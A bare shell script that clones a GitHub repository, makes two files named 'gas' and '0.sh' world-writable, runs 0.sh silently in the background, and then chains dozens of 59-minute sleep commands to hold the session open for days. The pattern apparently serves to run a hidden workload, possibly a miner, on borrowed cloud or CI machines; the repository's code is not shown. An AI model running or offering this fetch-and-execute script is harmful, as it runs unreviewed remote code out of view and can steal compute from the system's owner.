git clone https://github.com/Ghuuyi/a.git
cd a
chmod 777 gas 0.sh
./0.sh > /dev/null &
sleep 0m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
sleep 59m
